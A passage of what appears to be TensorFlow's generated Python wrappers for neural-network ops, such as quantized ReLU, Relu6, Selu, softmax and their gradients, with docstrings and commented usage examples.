_attrs = ("T", _op._get_attr_type("T"), "ksize", _op.get_attr("ksize"),
"strides", _op.get_attr("strides"), "padding",
_op.get_attr("padding"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedMaxPool", _inputs_flat, _attrs, _result)
_result = _QuantizedMaxPoolOutput._make(_result)
return _result
QuantizedMaxPool = tf_export("raw_ops.QuantizedMaxPool")(_ops.to_raw_op(quantized_max_pool))
def quantized_max_pool_eager_fallback(input, min_input, max_input, ksize, strides, padding, name, ctx):
if not isinstance(ksize, (list, tuple)):
raise TypeError(
"Expected list for 'ksize' argument to "
"'quantized_max_pool' Op, not %r." % ksize)
ksize = [_execute.make_int(_i, "ksize") for _i in ksize]
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'quantized_max_pool' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
_attr_T, (input,) = _execute.args_to_matching_eager([input], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
min_input = _ops.convert_to_tensor(min_input, _dtypes.float32)
max_input = _ops.convert_to_tensor(max_input, _dtypes.float32)
_inputs_flat = [input, min_input, max_input]
_attrs = ("T", _attr_T, "ksize", ksize, "strides", strides, "padding",
padding)
_result = _execute.execute(b"QuantizedMaxPool", 3, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedMaxPool", _inputs_flat, _attrs, _result)
_result = _QuantizedMaxPoolOutput._make(_result)
return _result
_QuantizedReluOutput = collections.namedtuple(
"QuantizedRelu",
["activations", "min_activations", "max_activations"])
def quantized_relu(features, min_features, max_features, out_type=_dtypes.quint8, name=None):
r"""Computes Quantized Rectified Linear: `max(features, 0)`
Args:
features: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
min_features: A `Tensor` of type `float32`.
The float value that the lowest quantized value represents.
max_features: A `Tensor` of type `float32`.
The float value that the highest quantized value represents.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.quint8`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (activations, min_activations, max_activations).
activations: A `Tensor` of type `out_type`.
min_activations: A `Tensor` of type `float32`.
max_activations: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedRelu", name, features, min_features, max_features,
"out_type", out_type)
_result = _QuantizedReluOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_relu_eager_fallback(
features, min_features, max_features, out_type=out_type, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedRelu", features=features, min_features=min_features,
max_features=max_features, out_type=out_type,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "out_type",
_op._get_attr_type("out_type"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedRelu", _inputs_flat, _attrs, _result)
_result = _QuantizedReluOutput._make(_result)
return _result
QuantizedRelu = tf_export("raw_ops.QuantizedRelu")(_ops.to_raw_op(quantized_relu))
def quantized_relu_eager_fallback(features, min_features, max_features, out_type, name, ctx):
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
_attr_Tinput, (features,) = _execute.args_to_matching_eager([features], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
min_features = _ops.convert_to_tensor(min_features, _dtypes.float32)
max_features = _ops.convert_to_tensor(max_features, _dtypes.float32)
_inputs_flat = [features, min_features, max_features]
_attrs = ("Tinput", _attr_Tinput, "out_type", out_type)
_result = _execute.execute(b"QuantizedRelu", 3, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedRelu", _inputs_flat, _attrs, _result)
_result = _QuantizedReluOutput._make(_result)
return _result
_QuantizedRelu6Output = collections.namedtuple(
"QuantizedRelu6",
["activations", "min_activations", "max_activations"])
def quantized_relu6(features, min_features, max_features, out_type=_dtypes.quint8, name=None):
r"""Computes Quantized Rectified Linear 6: `min(max(features, 0), 6)`
Args:
features: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
min_features: A `Tensor` of type `float32`.
The float value that the lowest quantized value represents.
max_features: A `Tensor` of type `float32`.
The float value that the highest quantized value represents.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.quint8`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (activations, min_activations, max_activations).
activations: A `Tensor` of type `out_type`.
min_activations: A `Tensor` of type `float32`.
max_activations: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedRelu6", name, features, min_features, max_features,
"out_type", out_type)
_result = _QuantizedRelu6Output._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_relu6_eager_fallback(
features, min_features, max_features, out_type=out_type, name=name,
ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedRelu6", features=features, min_features=min_features,
max_features=max_features, out_type=out_type,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "out_type",
_op._get_attr_type("out_type"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedRelu6", _inputs_flat, _attrs, _result)
_result = _QuantizedRelu6Output._make(_result)
return _result
QuantizedRelu6 = tf_export("raw_ops.QuantizedRelu6")(_ops.to_raw_op(quantized_relu6))
def quantized_relu6_eager_fallback(features, min_features, max_features, out_type, name, ctx):
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
_attr_Tinput, (features,) = _execute.args_to_matching_eager([features], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
min_features = _ops.convert_to_tensor(min_features, _dtypes.float32)
max_features = _ops.convert_to_tensor(max_features, _dtypes.float32)
_inputs_flat = [features, min_features, max_features]
_attrs = ("Tinput", _attr_Tinput, "out_type", out_type)
_result = _execute.execute(b"QuantizedRelu6", 3, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedRelu6", _inputs_flat, _attrs, _result)
_result = _QuantizedRelu6Output._make(_result)
return _result
_QuantizedReluXOutput = collections.namedtuple(
"QuantizedReluX",
["activations", "min_activations", "max_activations"])
def quantized_relu_x(features, max_value, min_features, max_features, out_type=_dtypes.quint8, name=None):
r"""Computes Quantized Rectified Linear X: `min(max(features, 0), max_value)`
Args:
features: A `Tensor`. Must be one of the following types: `qint8`, `quint8`, `qint32`, `qint16`, `quint16`.
max_value: A `Tensor` of type `float32`.
min_features: A `Tensor` of type `float32`.
The float value that the lowest quantized value represents.
max_features: A `Tensor` of type `float32`.
The float value that the highest quantized value represents.
out_type: An optional `tf.DType` from: `tf.qint8, tf.quint8, tf.qint32, tf.qint16, tf.quint16`. Defaults to `tf.quint8`.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (activations, min_activations, max_activations).
activations: A `Tensor` of type `out_type`.
min_activations: A `Tensor` of type `float32`.
max_activations: A `Tensor` of type `float32`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "QuantizedReluX", name, features, max_value, min_features,
max_features, "out_type", out_type)
_result = _QuantizedReluXOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return quantized_relu_x_eager_fallback(
features, max_value, min_features, max_features, out_type=out_type,
name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"QuantizedReluX", features=features, max_value=max_value,
min_features=min_features,
max_features=max_features, out_type=out_type,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("Tinput", _op._get_attr_type("Tinput"), "out_type",
_op._get_attr_type("out_type"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"QuantizedReluX", _inputs_flat, _attrs, _result)
_result = _QuantizedReluXOutput._make(_result)
return _result
QuantizedReluX = tf_export("raw_ops.QuantizedReluX")(_ops.to_raw_op(quantized_relu_x))
def quantized_relu_x_eager_fallback(features, max_value, min_features, max_features, out_type, name, ctx):
if out_type is None:
out_type = _dtypes.quint8
out_type = _execute.make_type(out_type, "out_type")
_attr_Tinput, (features,) = _execute.args_to_matching_eager([features], ctx, [_dtypes.qint8, _dtypes.quint8, _dtypes.qint32, _dtypes.qint16, _dtypes.quint16, ])
max_value = _ops.convert_to_tensor(max_value, _dtypes.float32)
min_features = _ops.convert_to_tensor(min_features, _dtypes.float32)
max_features = _ops.convert_to_tensor(max_features, _dtypes.float32)
_inputs_flat = [features, max_value, min_features, max_features]
_attrs = ("Tinput", _attr_Tinput, "out_type", out_type)
_result = _execute.execute(b"QuantizedReluX", 3, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"QuantizedReluX", _inputs_flat, _attrs, _result)
_result = _QuantizedReluXOutput._make(_result)
return _result
@_dispatch.add_dispatch_list
@tf_export('nn.relu')
def relu(features, name=None):
r"""Computes rectified linear: `max(features, 0)`.
See: https://en.wikipedia.org/wiki/Rectifier_(neural_networks)
Example usage:
>>> tf.nn.relu([-2., 0., -0., 3.]).numpy()
array([ 0.,  0., -0.,  3.], dtype=float32)
Args:
features: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`, `qint8`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `features`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Relu", name, features)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return relu_eager_fallback(
features, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
relu, (), dict(features=features, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Relu", features=features, name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
relu, (), dict(features=features, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Relu", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Relu = tf_export("raw_ops.Relu")(_ops.to_raw_op(relu))
def relu_eager_fallback(features, name, ctx):
_attr_T, (features,) = _execute.args_to_matching_eager([features], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, _dtypes.qint8, ])
_inputs_flat = [features]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"Relu", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Relu", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def relu6(features, name=None):
r"""Computes rectified linear 6: `min(max(features, 0), 6)`.
Args:
features: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `features`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Relu6", name, features)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return relu6_eager_fallback(
features, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Relu6", features=features, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Relu6", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Relu6 = tf_export("raw_ops.Relu6")(_ops.to_raw_op(relu6))
def relu6_eager_fallback(features, name, ctx):
_attr_T, (features,) = _execute.args_to_matching_eager([features], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
_inputs_flat = [features]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"Relu6", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Relu6", _inputs_flat, _attrs, _result)
_result, = _result
return _result
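# Editorial usage sketch: the public `tf.nn.relu6` wrapper reaches this op in
# eager mode (assumes TensorFlow 2.x with `import tensorflow as tf`).
#
# >>> tf.nn.relu6([-1., 2., 8.]).numpy()
# array([0., 2., 6.], dtype=float32)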
def relu6_grad(gradients, features, name=None):
r"""Computes rectified linear 6 gradients for a Relu6 operation.
Args:
gradients: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
The backpropagated gradients to the corresponding Relu6 operation.
features: A `Tensor`. Must have the same type as `gradients`.
The features passed as input to the corresponding Relu6 operation, or
its output; using either one produces the same result.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `gradients`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Relu6Grad", name, gradients, features)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return relu6_grad_eager_fallback(
gradients, features, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Relu6Grad", gradients=gradients, features=features, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Relu6Grad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Relu6Grad = tf_export("raw_ops.Relu6Grad")(_ops.to_raw_op(relu6_grad))
def relu6_grad_eager_fallback(gradients, features, name, ctx):
_attr_T, _inputs_T = _execute.args_to_matching_eager([gradients, features], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
(gradients, features) = _inputs_T
_inputs_flat = [gradients, features]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"Relu6Grad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Relu6Grad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
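# Editorial sketch of the gradient rule: the incoming gradient passes through
# only where 0 < features < 6 (assumes `import tensorflow as tf`).
#
# >>> tf.raw_ops.Relu6Grad(gradients=tf.ones([4]),
# ...                      features=tf.constant([-1., 2., 5., 7.])).numpy()
# array([0., 1., 1., 0.], dtype=float32)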
def relu_grad(gradients, features, name=None):
r"""Computes rectified linear gradients for a Relu operation.
Args:
gradients: A `Tensor`. Must be one of the following types: `float32`, `float64`, `int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`, `uint32`, `uint64`.
The backpropagated gradients to the corresponding Relu operation.
features: A `Tensor`. Must have the same type as `gradients`.
The features passed as input to the corresponding Relu operation, OR
the outputs of that operation (both work equivalently).
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `gradients`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "ReluGrad", name, gradients, features)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return relu_grad_eager_fallback(
gradients, features, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"ReluGrad", gradients=gradients, features=features, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"ReluGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
ReluGrad = tf_export("raw_ops.ReluGrad")(_ops.to_raw_op(relu_grad))
def relu_grad_eager_fallback(gradients, features, name, ctx):
_attr_T, _inputs_T = _execute.args_to_matching_eager([gradients, features], ctx, [_dtypes.float32, _dtypes.float64, _dtypes.int32, _dtypes.uint8, _dtypes.int16, _dtypes.int8, _dtypes.int64, _dtypes.bfloat16, _dtypes.uint16, _dtypes.half, _dtypes.uint32, _dtypes.uint64, ])
(gradients, features) = _inputs_T
_inputs_flat = [gradients, features]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"ReluGrad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"ReluGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
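# Editorial sketch: the `record_gradient` calls above are what let
# `tf.GradientTape` dispatch to ReluGrad when differentiating the forward op;
# the gradient is the incoming gradient masked by `features > 0`.
#
# >>> x = tf.constant([-3., 0., 4.])
# >>> with tf.GradientTape() as tape:
# ...     tape.watch(x)
# ...     y = tf.nn.relu(x)
# >>> tape.gradient(y, x).numpy()
# array([0., 0., 1.], dtype=float32)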
@_dispatch.add_dispatch_list
@tf_export('nn.selu')
def selu(features, name=None):
r"""Computes scaled exponential linear: `scale * alpha * (exp(features) - 1)`
if < 0, `scale * features` otherwise.
To be used together with
`initializer = tf.variance_scaling_initializer(factor=1.0, mode='FAN_IN')`.
For correct dropout, use `tf.contrib.nn.alpha_dropout`.
See [Self-Normalizing Neural Networks](https://arxiv.org/abs/1706.02515)
Args:
features: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `features`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Selu", name, features)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return selu_eager_fallback(
features, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
selu, (), dict(features=features, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
# Add nodes to the TensorFlow graph.
try:
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Selu", features=features, name=name)
except (TypeError, ValueError):
result = _dispatch.dispatch(
selu, (), dict(features=features, name=name)
)
if result is not _dispatch.OpDispatcher.NOT_SUPPORTED:
return result
raise
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Selu", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Selu = tf_export("raw_ops.Selu")(_ops.to_raw_op(selu))
def selu_eager_fallback(features, name, ctx):
_attr_T, (features,) = _execute.args_to_matching_eager([features], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
_inputs_flat = [features]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"Selu", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Selu", _inputs_flat, _attrs, _result)
_result, = _result
return _result
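# Editorial usage sketch (assumes `import tensorflow as tf`): with the fixed
# constants scale ~ 1.0507 and alpha ~ 1.6733 baked into the kernel,
# selu(-1.) ~ scale * alpha * (exp(-1.) - 1) ~ -1.1113.
#
# >>> tf.nn.selu([-1., 0., 1.]).numpy()
# array([-1.1113307,  0.       ,  1.050701 ], dtype=float32)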
def selu_grad(gradients, outputs, name=None):
r"""Computes gradients for the scaled exponential linear (Selu) operation.
Args:
gradients: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
The backpropagated gradients to the corresponding Selu operation.
outputs: A `Tensor`. Must have the same type as `gradients`.
The outputs of the corresponding Selu operation.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `gradients`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "SeluGrad", name, gradients, outputs)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return selu_grad_eager_fallback(
gradients, outputs, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"SeluGrad", gradients=gradients, outputs=outputs, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"SeluGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
SeluGrad = tf_export("raw_ops.SeluGrad")(_ops.to_raw_op(selu_grad))
def selu_grad_eager_fallback(gradients, outputs, name, ctx):
_attr_T, _inputs_T = _execute.args_to_matching_eager([gradients, outputs], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
(gradients, outputs) = _inputs_T
_inputs_flat = [gradients, outputs]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"SeluGrad", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"SeluGrad", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def softmax(logits, name=None):
r"""Computes softmax activations.
For each batch `i` and class `j` we have
$$softmax[i, j] = exp(logits[i, j]) / sum_j(exp(logits[i, j]))$$
Args:
logits: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
2-D with shape `[batch_size, num_classes]`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `logits`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Softmax", name, logits)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return softmax_eager_fallback(
logits, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Softmax", logits=logits, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Softmax", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Softmax = tf_export("raw_ops.Softmax")(_ops.to_raw_op(softmax))
def softmax_eager_fallback(logits, name, ctx):
_attr_T, (logits,) = _execute.args_to_matching_eager([logits], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
_inputs_flat = [logits]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"Softmax", 1, inputs=_inputs_flat, attrs=_attrs,
ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Softmax", _inputs_flat, _attrs, _result)
_result, = _result
return _result
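# Editorial sketch of the formula in the docstring: each row is exponentiated
# and normalized so it sums to 1 (assumes `import tensorflow as tf`).
#
# >>> tf.nn.softmax(tf.constant([[1., 2., 3.]])).numpy()
# array([[0.09003057, 0.24472848, 0.66524094]], dtype=float32)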
_SoftmaxCrossEntropyWithLogitsOutput = collections.namedtuple(
"SoftmaxCrossEntropyWithLogits",
["loss", "backprop"])
def softmax_cross_entropy_with_logits(features, labels, name=None):
r"""Computes softmax cross entropy cost and gradients to backpropagate.
Inputs are the logits, not probabilities.
Args:
features: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
batch_size x num_classes matrix
labels: A `Tensor`. Must have the same type as `features`.
batch_size x num_classes matrix
The caller must ensure that each batch of labels represents a valid
probability distribution.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (loss, backprop).
loss: A `Tensor`. Has the same type as `features`.
backprop: A `Tensor`. Has the same type as `features`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "SoftmaxCrossEntropyWithLogits", name, features, labels)
_result = _SoftmaxCrossEntropyWithLogitsOutput._make(_result)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return softmax_cross_entropy_with_logits_eager_fallback(
features, labels, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
# Add nodes to the TensorFlow graph.
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"SoftmaxCrossEntropyWithLogits", features=features, labels=labels,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"SoftmaxCrossEntropyWithLogits", _inputs_flat, _attrs, _result)
_result = _SoftmaxCrossEntropyWithLogitsOutput._make(_result)
return _result
SoftmaxCrossEntropyWithLogits = tf_export("raw_ops.SoftmaxCrossEntropyWithLogits")(_ops.to_raw_op(softmax_cross_entropy_with_logits))
def softmax_cross_entropy_with_logits_eager_fallback(features, labels, name, ctx):
_attr_T, _inputs_T = _execute.args_to_matching_eager([features, labels], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
(features, labels) = _inputs_T
_inputs_flat = [features, labels]
_attrs = ("T", _attr_T)
_result = _execute.execute(b"SoftmaxCrossEntropyWithLogits", 2,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"SoftmaxCrossEntropyWithLogits", _inputs_flat, _attrs, _result)
_result = _SoftmaxCrossEntropyWithLogitsOutput._make(_result)
return _result
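# Editorial sketch via the raw op: `labels` must be a valid per-row probability
# distribution, and the second output is the gradient wrt the logits
# (assumes `import tensorflow as tf`).
#
# >>> loss, backprop = tf.raw_ops.SoftmaxCrossEntropyWithLogits(
# ...     features=tf.constant([[2., 1., .1]]),
# ...     labels=tf.constant([[1., 0., 0.]]))
# >>> loss.numpy()
# array([0.41703], dtype=float32)  # -log(softmax(logits)[0, 0]), approximately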
@_dispatch.add_dispatch_list
@tf_export('math.softplus', 'nn.softplus')
def softplus(features, name=None):
r"""Computes softplus: `log(exp(features) + 1)`.
Args:
features: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `features`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Softplus", name, features)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return softplus_eager_fallback(
features, name=name, ctx=_ctx)
except _core._SymbolicException:
pass # Add nodes to the TensorFlow graph.
except (TypeError, ValueError):
result = _dispatch.dispatch(
softplus, (), dict(features=features, name=name)
)
